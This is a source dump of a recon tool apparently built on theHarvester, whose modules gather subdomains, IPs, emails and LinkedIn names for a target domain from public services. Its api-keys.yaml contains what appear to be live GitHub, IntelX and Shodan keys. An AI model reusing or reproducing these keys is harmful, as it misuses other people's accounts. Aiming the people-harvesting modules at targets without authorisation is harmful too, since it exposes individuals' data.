48 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
49 | self.title_patten = re.compile('<title>(.*)?</title>')
50 |
51 | def run(self):
52 | for host in self.Hosts:
53 | self.queueTasks.put(host)
54 |
55 | threads = []
56 | for i in range(1, self.threadsNum + 1):
57 | t = Thread(target=self.scan)
58 | threads.append(t)
59 | t.start()
60 | for t in threads:
61 | t.join()
62 |
63 | def scan(self):
64 | while not self.queueTasks.empty():
65 | queueTask = self.queueTasks.get()
66 | try:
67 | pass
68 | except Exception:
69 | pass
70 |
71 | def save(self, content):
72 | with open('{}/{}_ports.txt'.format(self.save_fold_path, self.fileName), 'at') as f:
73 | f.writelines('{}\n'.format(content))
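
The scan() worker above is intentionally left as a stub. As a hedged sketch (not part of the template itself), the per-task work could look roughly like the standalone helper below, which reuses the same request headers, timeout, and title regex prepared in __init__; the function name scan_host is hypothetical, and inside webDetect.scan() each item taken from the queue would be passed to it and the returned line written out with self.save().

import re
import requests

TITLE_PATTEN = re.compile('<title>(.*)?</title>')


def scan_host(host, headers, timeout=10):
    """Hypothetical per-task logic for the scan() stub: fetch the host and pull out its <title>."""
    url = host if host.startswith('http') else 'http://{}'.format(host)
    resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
    titles = TITLE_PATTEN.findall(resp.text)
    return '{}\t{}'.format(url, titles[0].strip() if titles else '')
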
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.gitattributes:
--------------------------------------------------------------------------------
1 | # Set the default behavior, which is to have git automatically determine
2 | # whether a file is a text or binary, unless otherwise specified.
3 |
4 | * text=auto
5 |
6 | # Basic .gitattributes for a python repo.
7 |
8 | # Source files
9 | # ============
10 | *.pxd text diff=python
11 | *.py text diff=python
12 | *.py3 text diff=python
13 | *.pyw text diff=python
14 | *.pyx text diff=python
15 |
16 | # Binary files
17 | # ============
18 | *.db binary
19 | *.p binary
20 | *.pkl binary
21 | *.pyc binary
22 | *.pyd binary
23 | *.pyo binary
24 |
25 | # Note: .db, .p, and .pkl files are associated with the python modules
26 | # ``pickle``, ``dbm.*``, # ``shelve``, ``marshal``, ``anydbm``, & ``bsddb``
27 | # (among others).
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.gitignore:
--------------------------------------------------------------------------------
1 | *.idea
2 | *.pyc
3 | *.sqlite
4 | *.html
5 | *.htm
6 | *.vscode
7 | *.xml
8 | debug_results.txt
9 | venv
10 | .mypy_cache
11 | .pytest_cache
12 | build/
13 | dist/
14 | .DS_Store
15 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.lgtm.yml:
--------------------------------------------------------------------------------
1 | queries:
2 | - exclude: py/import-and-import-from
3 | - exclude: py/polluting-import
4 |
5 | extraction:
6 | python:
7 | python_setup:
8 | version: 3
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.travis.yml:
--------------------------------------------------------------------------------
1 | dist: bionic
2 | language: python
3 | cache: pip
4 | matrix:
5 | allow_failures:
6 | - python: 'nightly'
7 | include:
8 | - python: 'nightly'
9 | env: TEST_SUITE=suite_3_9
10 |
11 | before_install:
12 | - pip install -r requirements/dev.txt
13 | install:
14 | - python setup.py test
15 | script:
16 | - python theHarvester.py -d apple.com -b baidu,bing,bufferoverun,certspotter,crtsh,dnsdumpster,dogpile,duckduckgo,exalead,linkedin,netcraft,intelx,threatcrowd,trello,twitter,virustotal,yahoo,rapiddns
17 | -l 200
18 | - pytest
19 | - flake8 . --count --show-source --statistics
20 | - mypy --pretty theHarvester/discovery/*.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:alpine3.11
2 | RUN mkdir /app
3 | WORKDIR /app
4 | COPY . /app
5 | RUN apk add --update build-base libffi-dev libxml2-dev libxslt-dev
6 | RUN pip3 install -r requirements.txt
7 | RUN chmod +x *.py
8 | ENTRYPOINT ["/app/theHarvester.py"]
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/Pipfile:
--------------------------------------------------------------------------------
1 | [[source]]
2 | url = "https://pypi.python.org/simple"
3 | verify_ssl = true
4 | name = "pypi"
5 |
6 | [packages]
7 | aiodns = "==2.0.0"
8 | aiohttp = "==3.6.2"
9 | aiosqlite = "==0.13.0"
10 | beautifulsoup4 = "==4.9.1"
11 | dnspython = "==1.16.0"
12 | netaddr = "==0.7.19"
13 | plotly = "==4.7.1"
14 | PyYAML = "==5.3.1"
15 | requests = "==2.23.0"
16 | retrying = "==1.3.3"
17 | shodan = "==1.23.0"
18 | texttable = "==1.6.2"
19 | lxml = "==4.5.1"
20 | uvloop = "==0.14.0"
21 | certifi = "==2020.4.5.1"
22 |
23 | [dev-packages]
24 | flake8 = "==3.8.2"
25 | mypy = "==0.770"
26 | mypy-extensions = "==0.4.3"
27 | pyflakes = "==2.2.0"
28 | pytest = "==5.4.2"
29 | pytest-asyncio = "==0.12.0"
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/README/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing to theHarvester Project
 2 | Welcome to the theHarvester project; we are glad you would like to contribute.
 3 | The requirements below must be met for a contribution to be accepted.
4 |
5 | # CI
 6 | Make sure all CI checks pass and that you do not introduce any alerts from lgtm.
7 |
8 | # Unit Tests
 9 | Every new module requires a unit test for that module; we use pytest.
10 |
11 | # Coding Standards
12 | * No single-letter variables; variable names must describe what they hold or do
13 | * Use static typing on functions and the like
14 | * Make sure mypy reports no errors
15 | * Make sure flake8 reports no issues
16 |
17 | # Submitting Bugs
18 | If you find a bug in a module that you want to submit an issue for and you know how to write Python code,
19 | please create a unit test for that bug (if possible) and submit a fix for it, as that would be a big help to the project.
20 |
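
As a hedged illustration of these standards (not an official project template), a new discovery module and its pytest unit test might look like the sketch below. The module name SearchExample and the file names in the comments are invented for illustration; the async methods, type hints, and the pytest.mark.asyncio marker mirror the pattern used by the discovery modules and tests later in this dump, and the test relies on pytest-asyncio as pinned in requirements/dev.txt.

# examplesearch.py - hypothetical discovery module following the standards above
from typing import Set

import pytest


class SearchExample:
    def __init__(self, word: str) -> None:
        self.word: str = word
        self.totalhosts: Set[str] = set()

    async def do_search(self) -> None:
        # A real module would fetch data from an external source here;
        # this stub just records the target domain so the test has something to check.
        self.totalhosts.add(self.word)

    async def get_hostnames(self) -> Set[str]:
        return self.totalhosts

    async def process(self) -> None:
        await self.do_search()


# test_examplesearch.py - pytest unit test for the module (requires pytest-asyncio)
pytestmark = pytest.mark.asyncio


async def test_search() -> None:
    search = SearchExample('metasploit.com')
    await search.process()
    assert isinstance(await search.get_hostnames(), set)
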
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/README/LICENSES:
--------------------------------------------------------------------------------
1 | Released under the GPL v 2.0.
2 |
3 | If you did not receive a copy of the GPL, try http://www.gnu.org/.
4 |
5 | Copyright 2011 Christian Martorella
6 |
7 | theHarvester is free software; you can redistribute it and/or modify
8 | it under the terms of the GNU General Public License as published by
9 | the Free Software Foundation version 2 of the License.
10 |
11 | theHarvester is distributed in the hope that it will be useful,
12 | but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | GNU General Public License for more details.
15 | You should have received a copy of the GNU General Public License along with theHarvester; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
16 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/api-keys.yaml:
--------------------------------------------------------------------------------
1 | apikeys:
2 | bing:
3 | key:
4 |
5 | github:
6 | key: 6571b30a3aa4cdd8a5e0ec6a49033fb47daf373a
7 |
8 | hunter:
9 | key:
10 |
11 | intelx:
12 | key: 9df61df0-84f7-4dc7-b34c-8ccfb8646ace
13 |
14 | pentestTools:
15 | key:
16 |
17 | securityTrails:
18 | key:
19 |
20 | shodan:
21 | key: jAMql7At3FkMTO6tE3XqtNFegKvLxRXu
22 |
23 | spyse:
24 | key:
25 |
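
The discovery modules below obtain these values through helpers such as Core.shodan_key() and Core.intelx_key(). As a rough sketch of how a YAML file with this exact layout can be read with PyYAML (already pinned in requirements/base.txt), and not necessarily how Core implements it, a loader might look like this; the function name read_api_key is hypothetical.

import yaml  # PyYAML


def read_api_key(name: str, path: str = 'api-keys.yaml') -> str:
    """Return the API key configured for a given service, or '' if it is not set."""
    with open(path, 'r') as handle:
        keys = yaml.safe_load(handle)
    # Missing services and empty "key:" entries both fall back to an empty string.
    return (keys.get('apikeys', {}).get(name) or {}).get('key') or ''


# Example usage: shodan_key = read_api_key('shodan')
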
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/mypy.ini:
--------------------------------------------------------------------------------
1 | [mypy]
2 | ignore_missing_imports = True
3 | show_traceback = True
4 | show_error_codes = True
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/proxies.yaml:
--------------------------------------------------------------------------------
1 | http:
2 | - ip:port
3 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/requirements.txt:
--------------------------------------------------------------------------------
1 | -r requirements/base.txt
2 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/requirements/base.txt:
--------------------------------------------------------------------------------
1 | aiodns==2.0.0
2 | aiohttp==3.6.2
3 | aiosqlite==0.13.0
4 | beautifulsoup4==4.9.1
5 | dnspython==1.16.0
6 | netaddr==0.7.19
7 | plotly==4.7.1
8 | PyYAML==5.3.1
9 | requests==2.23.0
10 | retrying==1.3.3
11 | shodan==1.23.0
12 | texttable==1.6.2
13 | lxml==4.5.1
14 | uvloop==0.14.0
15 | certifi==2020.4.5.1
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/requirements/dev.txt:
--------------------------------------------------------------------------------
1 | -r base.txt
2 | flake8==3.8.2
3 | mypy==0.770
4 | mypy-extensions==0.4.3
5 | pyflakes==2.2.0
6 | pytest==5.4.2
7 | pytest-asyncio==0.12.0
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['baidusearch',
2 | 'bingsearch',
3 | 'bufferoverun',
4 | 'crtsh',
5 | 'certspottersearch',
6 | 'dnssearch',
7 | 'dogpilesearch',
8 | 'duckduckgosearch',
9 | 'exaleadsearch',
10 | 'githubcode',
11 | 'googlesearch',
12 | 'hackertarget',
13 | 'huntersearch',
14 | 'intelxsearch',
15 | 'linkedinsearch',
16 | 'netcraft',
17 | 'otxsearch',
18 | 'pentesttools',
19 | 'rapiddns',
20 | 'securitytrailssearch',
21 | 'shodansearch',
22 | 'spyse',
23 | 'sublist3r',
24 | 'takeover',
25 | 'threatcrowd',
26 | 'trello',
27 | 'twittersearch',
28 | 'urlscan',
29 | 'virustotal',
30 | 'yahoosearch',
31 | ]
32 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/baidusearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 |
4 | class SearchBaidu:
5 |
6 | def __init__(self, word, limit):
7 | self.word = word
8 | self.total_results = ""
9 | self.server = 'www.baidu.com'
10 | self.hostname = 'www.baidu.com'
11 | self.limit = limit
12 | self.proxy = False
13 |
14 | async def do_search(self):
15 | headers = {
16 | 'Host': self.hostname,
17 | 'User-agent': Core.get_user_agent()
18 | }
19 | base_url = f'https://{self.server}/s?wd=%40{self.word}&pnxx&oq={self.word}'
20 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
21 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
22 | for response in responses:
23 | self.total_results += response
24 |
25 | async def process(self, proxy=False):
26 | self.proxy = proxy
27 | await self.do_search()
28 |
29 | async def get_emails(self):
30 | rawres = myparser.Parser(self.total_results, self.word)
31 | return await rawres.emails()
32 |
33 | async def get_hostnames(self):
34 | rawres = myparser.Parser(self.total_results, self.word)
35 | return await rawres.hostnames()
36 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/bufferoverun.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | import re
3 |
4 |
5 | class SearchBufferover:
6 | def __init__(self, word):
7 | self.word = word
8 | self.totalhosts = set()
9 | self.totalips = set()
10 | self.proxy = False
11 |
12 | async def do_search(self):
13 | url = f'https://dns.bufferover.run/dns?q=.{self.word}'
14 | responses = await AsyncFetcher.fetch_all(urls=[url], json=True, proxy=self.proxy)
15 | responses = responses[0]
16 | dct = responses
17 |
18 | self.totalhosts: set = {
19 | host.split(',')[0].replace('www.', '') if ',' in host and self.word.replace('www.', '') in host.split(',')[
20 | 0] in host else
21 | host.split(',')[1] for host in dct['FDNS_A']}
22 |
23 | self.totalips: set = {ip.split(',')[0] for ip in dct['FDNS_A'] if
24 | re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", ip.split(',')[0])}
25 |
26 | async def get_hostnames(self) -> set:
27 | return self.totalhosts
28 |
29 | async def get_ips(self) -> set:
30 | return self.totalips
31 |
32 | async def process(self, proxy=False):
33 | self.proxy = proxy
34 | await self.do_search()
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/certspottersearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 |
3 |
4 | class SearchCertspoter:
5 |
6 | def __init__(self, word):
7 | self.word = word
8 | self.totalhosts = set()
9 | self.proxy = False
10 |
11 | async def do_search(self) -> None:
12 | base_url = f'https://api.certspotter.com/v1/issuances?domain={self.word}&expand=dns_names'
13 | try:
14 | response = await AsyncFetcher.fetch_all([base_url], json=True, proxy=self.proxy)
15 | response = response[0]
16 | if isinstance(response, list):
17 | for dct in response:
18 | for key, value in dct.items():
19 | if key == 'dns_names':
20 | self.totalhosts.update({name for name in value if name})
21 | elif isinstance(response, dict):
22 | self.totalhosts.update({response['dns_names'] if 'dns_names' in response.keys() else ''})
23 | else:
24 | self.totalhosts.update({''})
25 | except Exception as e:
26 | print(e)
27 |
28 | async def get_hostnames(self) -> set:
29 | return self.totalhosts
30 |
31 | async def process(self, proxy=False):
32 | self.proxy = proxy
33 | await self.do_search()
34 | print('\tSearching results.')
35 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/crtsh.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
 2 | from typing import List, Set
3 |
4 |
5 | class SearchCrtsh:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.data = set()
10 | self.proxy = False
11 |
12 | async def do_search(self) -> List:
13 | data: set = set()
14 | try:
15 | url = f'https://crt.sh/?q=%25.{self.word}&output=json'
16 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
17 | response = response[0]
18 | data = set(
19 | [dct['name_value'][2:] if '*.' == dct['name_value'][:2] else dct['name_value']
20 | for dct in response])
21 | data = {domain for domain in data if (domain[0] != '*' and str(domain[0:4]).isnumeric() is False)}
22 | except Exception as e:
23 | print(e)
24 | clean = []
25 | for x in data:
26 | pre = x.split()
27 | for y in pre:
28 | clean.append(y)
29 | return clean
30 |
31 | async def process(self, proxy=False) -> None:
32 | self.proxy = proxy
33 | data = await self.do_search()
34 | self.data = data
35 |
36 | async def get_hostnames(self) -> Set:
37 | return self.data
38 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/dnsdumpster.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 | import aiohttp
4 | import asyncio
5 |
6 |
7 | class SearchDnsDumpster:
8 |
9 | def __init__(self, word):
10 | self.word = word.replace(' ', '%20')
11 | self.results = ""
12 | self.totalresults = ""
13 | self.server = 'dnsdumpster.com'
14 | self.proxy = False
15 |
16 | async def do_search(self):
17 | try:
18 | agent = Core.get_user_agent()
19 | headers = {'User-Agent': agent}
20 | session = aiohttp.ClientSession(headers=headers)
21 | # create a session to properly verify
22 | url = f'https://{self.server}'
23 | csrftoken = ''
24 | if self.proxy is False:
25 | async with session.get(url, headers=headers) as resp:
26 | cookies = str(resp.cookies)
27 | cookies = cookies.split('csrftoken=')
28 | csrftoken += cookies[1][:cookies[1].find(';')]
29 | else:
30 | async with session.get(url, headers=headers, proxy=self.proxy) as resp:
31 | cookies = str(resp.cookies)
32 | cookies = cookies.split('csrftoken=')
33 | csrftoken += cookies[1][:cookies[1].find(';')]
34 | await asyncio.sleep(2)
35 |
36 | # extract csrftoken from cookies
37 | data = {
38 | 'Cookie': f'csfrtoken={csrftoken}', 'csrfmiddlewaretoken': csrftoken, 'targetip': self.word}
39 | headers['Referer'] = url
40 | if self.proxy is False:
41 | async with session.post(url, headers=headers, data=data) as resp:
42 | self.results = await resp.text()
43 | else:
44 | async with session.post(url, headers=headers, data=data, proxy=self.proxy) as resp:
45 | self.results = await resp.text()
46 | await session.close()
47 | except Exception as e:
48 | print(f'An exception occurred: {e}')
49 | self.totalresults += self.results
50 |
51 | async def get_hostnames(self):
52 | rawres = myparser.Parser(self.totalresults, self.word)
53 | return await rawres.hostnames()
54 |
55 | async def process(self, proxy=False):
56 | self.proxy = proxy
57 | await self.do_search() # Only need to do it once.
58 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/dogpilesearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
3 |
4 |
5 | class SearchDogpile:
6 |
7 | def __init__(self, word, limit):
8 | self.word = word
9 | self.total_results = ""
10 | self.server = 'www.dogpile.com'
11 | self.hostname = 'www.dogpile.com'
12 | self.limit = limit
13 | self.proxy = False
14 |
15 | async def do_search(self):
16 | # Dogpile is hardcoded to return 10 results.
17 | try:
18 | headers = {'User-agent': Core.get_user_agent()}
19 | base_url = f'https://{self.server}/search/web?qsi=xx&q=%40{self.word}'
20 | urls = [base_url.replace("xx", str(num)) for num in range(0, self.limit, 10) if num <= self.limit]
21 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
22 | for response in responses:
23 | self.total_results += response
24 | except Exception as e:
25 | print(f'Error Occurred: {e}')
26 |
27 | async def process(self, proxy=False):
28 | self.proxy = proxy
29 | await self.do_search()
30 |
31 | async def get_emails(self):
32 | rawres = myparser.Parser(self.total_results, self.word)
33 | return await rawres.emails()
34 |
35 | async def get_hostnames(self):
36 | rawres = myparser.Parser(self.total_results, self.word)
37 | return await rawres.hostnames()
38 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/hackertarget.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 |
3 |
4 | class SearchHackerTarget:
5 | """
6 | Class uses the HackerTarget api to gather subdomains and ips
7 | """
8 | def __init__(self, word):
9 | self.word = word
10 | self.total_results = ""
11 | self.hostname = 'https://api.hackertarget.com'
12 | self.proxy = False
13 | self.results = None
14 |
15 | async def do_search(self):
16 | headers = {'User-agent': Core.get_user_agent()}
17 | urls = [f'{self.hostname}/hostsearch/?q={self.word}', f'{self.hostname}/reversedns/?q={self.word}']
18 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
19 | for response in responses:
20 | self.total_results += response.replace(",", ":")
21 |
22 | async def process(self, proxy=False):
23 | self.proxy = proxy
24 | await self.do_search()
25 |
26 | async def get_hostnames(self) -> list:
27 | return self.total_results.splitlines()
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/huntersearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 |
5 |
6 | class SearchHunter:
7 |
8 | def __init__(self, word, limit, start):
9 | self.word = word
10 | self.limit = limit
11 | self.start = start
12 | self.key = Core.hunter_key()
13 | if self.key is None:
14 | raise MissingKey(True)
15 | self.total_results = ""
16 | self.counter = start
17 | self.database = f'https://api.hunter.io/v2/domain-search?domain={word}&api_key={self.key}&limit={self.limit}'
18 | self.proxy = False
19 |
20 | async def do_search(self):
21 | responses = await AsyncFetcher.fetch_all([self.database], headers={'User-Agent': Core.get_user_agent()},
22 | proxy=self.proxy)
23 | self.total_results += responses[0]
24 |
25 | async def process(self, proxy=False):
26 | self.proxy = proxy
27 | await self.do_search() # Only need to do it once.
28 |
29 | async def get_emails(self):
30 | rawres = myparser.Parser(self.total_results, self.word)
31 | return await rawres.emails()
32 |
33 | async def get_hostnames(self):
34 | rawres = myparser.Parser(self.total_results, self.word)
35 | return await rawres.hostnames()
36 |
37 | async def get_profiles(self):
38 | rawres = myparser.Parser(self.total_results, self.word)
39 | return await rawres.profiles()
40 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/intelxsearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import intelxparser
4 | import asyncio
5 |
6 |
7 | class SearchIntelx:
8 |
9 | def __init__(self, word, limit):
10 | self.word = word
11 | # default key is public key
12 | self.key = Core.intelx_key()
13 | if self.key is None:
14 | raise MissingKey(True)
15 | self.database = 'https://public.intelx.io/'
16 | self.results = None
17 | self.info = ()
18 | self.limit = limit
19 | self.proxy = False
20 |
21 | async def do_search(self):
22 | try:
23 | user_agent = Core.get_user_agent()
24 | headers = {'User-Agent': user_agent, 'x-key': self.key}
25 | # data is json that corresponds to what we are searching for, sort:2 means sort by most relevant
26 | data = f'{{"term": "{self.word}", "maxresults": {self.limit}, "media": 0, "sort": 2 , "terminate": []}}'
27 | resp = await AsyncFetcher.post_fetch(url=f'{self.database}phonebook/search', headers=headers, data=data,
28 | json=True, proxy=self.proxy)
29 | uuid = resp['id']
30 | # grab uuid to send get request to fetch data
31 | await asyncio.sleep(2)
32 | url = f'{self.database}phonebook/search/result?id={uuid}&offset=0&limit={self.limit}'
33 | resp = await AsyncFetcher.fetch_all([url], headers=headers, json=True, proxy=self.proxy)
34 | resp = resp[0]
35 | # TODO: Check if more results can be gathered depending on status
36 | self.results = resp
37 | except Exception as e:
38 | print(f'An exception has occurred: {e.args}')
39 |
40 | async def process(self, proxy=False):
41 | self.proxy = proxy
42 | await self.do_search()
43 | intelx_parser = intelxparser.Parser()
44 | self.info = await intelx_parser.parse_dictionaries(self.results)
45 | # Create parser and set self.info to tuple returned from parsing text.
46 |
47 | async def get_emails(self):
48 | return self.info[0]
49 |
50 | async def get_hostnames(self):
51 | return self.info[1]
52 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/linkedinsearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import myparser
4 | import asyncio
5 |
6 |
7 | class SearchLinkedin:
8 |
9 | def __init__(self, word, limit):
10 | self.word = word.replace(' ', '%20')
11 | self.results = ""
12 | self.totalresults = ""
13 | self.server = 'www.google.com'
14 | self.quantity = '100'
15 | self.limit = int(limit)
16 | self.counter = 0
17 | self.proxy = False
18 |
19 | async def do_search(self):
20 | urly = 'http://' + self.server + '/search?num=100&start=' + str(self.counter) + '&hl=en&meta=&q=site%3Alinkedin.com/in%20' + self.word
21 | try:
22 | headers = {'User-Agent': Core.get_user_agent()}
23 | resp = await AsyncFetcher.fetch_all([urly], headers=headers, proxy=self.proxy)
24 | self.results = resp[0]
25 | if await search(self.results):
26 | try:
27 | self.results = await google_workaround(urly)
28 | if isinstance(self.results, bool):
29 | print('Google is blocking your ip and the workaround, returning')
30 | return
31 | except Exception:
32 | # google blocked, no useful result
33 | return
34 | except Exception as e:
35 | print(e)
36 | await asyncio.sleep(get_delay())
37 | self.totalresults += self.results
38 |
39 | async def get_people(self):
40 | rawres = myparser.Parser(self.totalresults, self.word)
41 | temp = await rawres.people_linkedin()
42 | return [person for person in temp
43 | if person[0] != '.' and '...' not in person and len(person.split()) != 1]
44 |
45 | async def get_links(self):
46 | links = myparser.Parser(self.totalresults, self.word)
47 | return await splitter(await links.links_linkedin())
48 |
49 | async def process(self, proxy=False):
50 | self.proxy = proxy
51 | while self.counter < self.limit:
52 | await self.do_search()
53 | await asyncio.sleep(get_delay())
54 | self.counter += 100
55 | print(f'\tSearching {self.counter} results.')
56 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/otxsearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
2 | import re
3 |
4 |
5 | class SearchOtx:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.totalhosts = set()
10 | self.totalips = set()
11 | self.proxy = False
12 |
13 | async def do_search(self):
14 | url = f'https://otx.alienvault.com/api/v1/indicators/domain/{self.word}/passive_dns'
15 | response = await AsyncFetcher.fetch_all([url], json=True, proxy=self.proxy)
16 | responses = response[0]
17 | dct = responses
18 | self.totalhosts: set = {host['hostname'] for host in dct['passive_dns']}
19 | # filter out ips that are just called NXDOMAIN
20 | self.totalips: set = {ip['address'] for ip in dct['passive_dns']
21 | if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", ip['address'])}
22 |
23 | async def get_hostnames(self) -> set:
24 | return self.totalhosts
25 |
26 | async def get_ips(self) -> set:
27 | return self.totalips
28 |
29 | async def process(self, proxy=False):
30 | self.proxy = proxy
31 | await self.do_search()
32 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/rapiddns.py:
--------------------------------------------------------------------------------
1 | from bs4 import BeautifulSoup
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 |
4 |
5 | class SearchRapidDns:
6 |
7 | def __init__(self, word):
8 | self.word = word
9 | self.total_results = []
10 | self.hostname = 'rapiddns.io'
11 | self.proxy = False
12 |
13 | async def do_search(self):
14 | try:
15 | headers = {'User-agent': Core.get_user_agent()}
16 | # TODO see if it's worth adding sameip searches
17 | # f'{self.hostname}/sameip/{self.word}?full=1#result'
18 | urls = [f'https://{self.hostname}/subdomain/{self.word}?full=1#result']
19 | responses = await AsyncFetcher.fetch_all(urls, headers=headers, proxy=self.proxy)
20 | if len(responses[0]) <= 1:
21 | return self.total_results
22 | soup = BeautifulSoup(responses[0], 'html.parser')
23 | rows = soup.find("table").find("tbody").find_all("tr")
24 | if rows:
25 | # Sanity check
26 | for row in rows:
27 | cells = row.find_all("td")
28 | if len(cells) >= 0:
29 | # sanity check
30 | subdomain = str(cells[0].get_text())
31 | if cells[-1].get_text() == 'CNAME':
32 | self.total_results.append(f'{subdomain}')
33 | else:
34 | self.total_results.append(f'{subdomain}:{str(cells[1].get_text()).strip()}')
35 | self.total_results = list({domain for domain in self.total_results})
36 | except Exception as e:
37 | print(f'An exception has occurred: {str(e.args)}')
38 |
39 | async def process(self, proxy=False):
40 | self.proxy = proxy
41 | await self.do_search()
42 |
43 | async def get_hostnames(self):
44 | return self.total_results
45 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/runTheHarvester/discovery/securitytrailssearch.py:
--------------------------------------------------------------------------------
1 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.discovery.constants import *
2 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.lib.core import *
3 | from Plugins.infoGather.subdomain.theHarvester.runTheHarvester.parsers import securitytrailsparser
4 | import asyncio
5 |
6 |
7 | class SearchSecuritytrail:
8 |
9 | def __init__(self, word):
10 | self.word = word
11 | self.key = Core.security_trails_key()
12 | if self.key is None:
13 | raise MissingKey(True)
14 | self.results = ""
15 | self.totalresults = ""
16 | self.api = 'https://api.securitytrails.com/v1/'
17 | self.info = ()
18 | self.proxy = False
19 |
20 | async def authenticate(self) -> None:
21 | # Method to authenticate API key before sending requests.
22 | headers = {'APIKEY': self.key}
23 | url = f'{self.api}ping'
24 | auth_responses = await AsyncFetcher.fetch_all([url], headers=headers, proxy=self.proxy)
25 | auth_responses = auth_responses[0]
